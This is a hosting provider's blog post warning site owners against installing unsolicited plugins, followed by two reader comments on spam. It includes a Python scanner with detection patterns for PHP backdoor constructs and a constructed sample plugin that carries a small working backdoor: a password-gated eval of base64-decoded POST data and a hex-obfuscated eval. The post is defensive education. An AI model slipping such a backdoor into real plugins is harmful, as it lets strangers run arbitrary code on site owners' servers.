Beware of strangers asking you to install software

Over the past week, we’ve seen customers fall victim to two separate scams in which strangers gained access to their sites by persuading them to install malicious software.

One of these involves a fake ad agency, and the other involves offers to upgrade outdated software on your site. Don’t fall for these!

What’s new about these?

“Phishing” messages have been around for years, and most of them work the same way: a stranger, usually posing as someone you trust, persuades you to hand over private information in exchange for a product or service. That information can be anything from your bank account number to a username and password.

So what’s different about these new messages? For a start, they are written by real people in fluent, professional English; they don’t read like the output of an automated script, or like the work of someone unfamiliar with “business English”. More importantly, they exploit another popular trend: content management systems.

Many users now rely on software like WordPress, Joomla, and phpBB to run their Web site. These software packages allow people to create and manage sophisticated Web sites that in the past would have required an experienced (and expensive) Web developer. As a result, users often rely more on third party software, and have become comfortable installing software based on description alone — without knowing how well tested it is or who wrote it. In fact, we’ve written about the threats of untested plugins before.

Both of the scams mentioned above exploit this new habit. Users were talked into installing custom software that supposedly added a specific feature to their site, only to discover later that it actually gave the “hackers” behind the message access to their files and information.

How can I avoid this?

The most important thing to remember is to never give out any personal information to somebody you do not know. You should treat all unsolicited e-mail asking for personal information as a scam unless you can verify otherwise.

Equally important: never install unsolicited software. Stick to well-tested software downloaded from sites you can verify. For example, while it doesn’t promise full security, the official WordPress plugin directory does scan each uploaded file for common bits of malicious code before making it available to users. Combine that with the many reviews a popular plugin accumulates, and you can feel more assured about the quality and safety of what you are installing. Neither check is a guarantee, though: a scan only catches patterns it already knows about, and a popular plugin can still carry an unpatched bug, so keep the plugins you do install updated and remove the ones you no longer use.
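To make the “scan for common bits of malicious code” idea concrete, here is an added example, written for this post rather than taken from the WordPress.org scanner or any real plugin. It runs a handful of heuristic signatures (eval of decoded data, eval or shell commands fed from request variables, the old preg_replace /e modifier, hex-escaped strings, long base64 blobs) over an unpacked plugin and reports what it finds. The signature list and the two-file sample plugin are constructed for illustration; a hit means “read this file before you activate it”, not proof of malware.

```python
import re
from typing import Dict, List, Tuple

# Heuristic signatures for constructs that are common in PHP backdoors and
# rare in honest plugins. A hit is a reason to read the code, not a verdict.
SUSPICIOUS_PATTERNS: List[Tuple[str, re.Pattern]] = [
    ("eval-of-decoded-data",
     re.compile(r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
    ("eval-of-request-input",
     re.compile(r"\beval\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I)),
    ("shell-exec-of-request-input",
     re.compile(r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I)),
    ("preg_replace-e-modifier",   # the /e modifier ran the replacement as PHP code
     re.compile(r"\bpreg_replace\s*\(\s*['\"]/.*?/[a-zA-Z]*e[a-zA-Z]*['\"]")),
    ("dynamic-function-creation",
     re.compile(r"\bcreate_function\s*\(", re.I)),
    ("hex-obfuscated-string",     # "\x65\x76\x61\x6c" spells "eval"
     re.compile(r"(?:\\x[0-9a-f]{2}){8,}", re.I)),
    ("long-base64-blob",
     re.compile(r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]")),
]

Finding = Tuple[str, int, str]  # (signature name, line number, matched snippet)


def scan_source(text: str) -> List[Finding]:
    """Return every signature hit in one file, ordered by line number."""
    findings: List[Finding] = []
    for name, pattern in SUSPICIOUS_PATTERNS:
        for m in pattern.finditer(text):
            line = text.count("\n", 0, m.start()) + 1
            findings.append((name, line, m.group(0)[:60]))
    return sorted(findings, key=lambda f: f[1])


def scan_plugin(files: Dict[str, str]) -> Dict[str, List[Finding]]:
    """Scan an unpacked plugin given as {relative path: contents}; only code files are checked."""
    return {path: scan_source(src) for path, src in files.items()
            if path.endswith((".php", ".phtml", ".inc", ".js", ".html"))}


def is_clean(report: Dict[str, List[Finding]]) -> bool:
    """True when no scanned file produced a hit."""
    return all(not hits for hits in report.values())


# Constructed sample plugin (not a real plugin): one honest file and one carrying
# the kind of backdoor the post describes, plus a readme the scanner skips.
SAMPLE_PLUGIN: Dict[str, str] = {
    "readme.txt": "=== SEO Booster Pro ===\nBoosts your SEO.\n",
    "hello-footer.php": r"""<?php
/*
Plugin Name: Hello Footer
*/
add_action('wp_footer', 'hello_footer_print');
function hello_footer_print() {
    echo '<p>' . esc_html(get_option('hello_footer_text', 'Hi')) . '</p>';
}
""",
    "seo-booster.php": r"""<?php
/*
Plugin Name: SEO Booster Pro
*/
add_action('init', 'seo_booster_init');
function seo_booster_init() {
    if (isset($_POST['sb_key']) && $_POST['sb_key'] === 'x9') {
        @eval(base64_decode($_POST['sb_cmd']));   // runs whatever the sender posts
    }
}
$x = "\x65\x76\x61\x6c\x28\x24\x5f\x50\x4f\x53\x54\x5b\x27\x61\x27\x5d\x29";
""",
}

if __name__ == "__main__":
    report = scan_plugin(SAMPLE_PLUGIN)
    for path, hits in report.items():
        print(f"{path}: {'clean' if not hits else str(len(hits)) + ' suspicious construct(s)'}")
        for sig, line, snippet in hits:
            print(f"  line {line}: {sig}: {snippet}")
    if is_clean(report):
        print("verdict: nothing flagged (still read the code before activating)")
    else:
        print("verdict: do not install without reading the flagged lines")
```

Run it against a plugin directory by reading each file into the dictionary first. The signatures deliberately favour obfuscation and “request variable straight into eval or a shell” over ordinary dangerous functions, because a legitimate plugin may need exec() but almost never needs to hide what it executes.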

Of course, Web site security isn’t completely up to you. We make sure to keep server-wide software updated on our end and to provide as much protection as possible at the server level. If you do your part, too, you’ll reduce the risk of problems dramatically.

2 Comments

  1. Grr..

    I have got so sick of spam I set up a high level spam blocker.

    But now I lose half my emails, especially coming from new senders.

    I don’t think there is any answer.

    But I just make sure never to give out any personal details online.

  2. I think the ultimate answer to spam is using S/MIME and authenticating/checking authenticity on every email. However, SMTP is a 30-year-old technology that we just don’t want to give up. That would mean that everyone would need to purchase a certificate to send email, but then when you get a phishing email you can validate it is not from whom they say they are… IMHO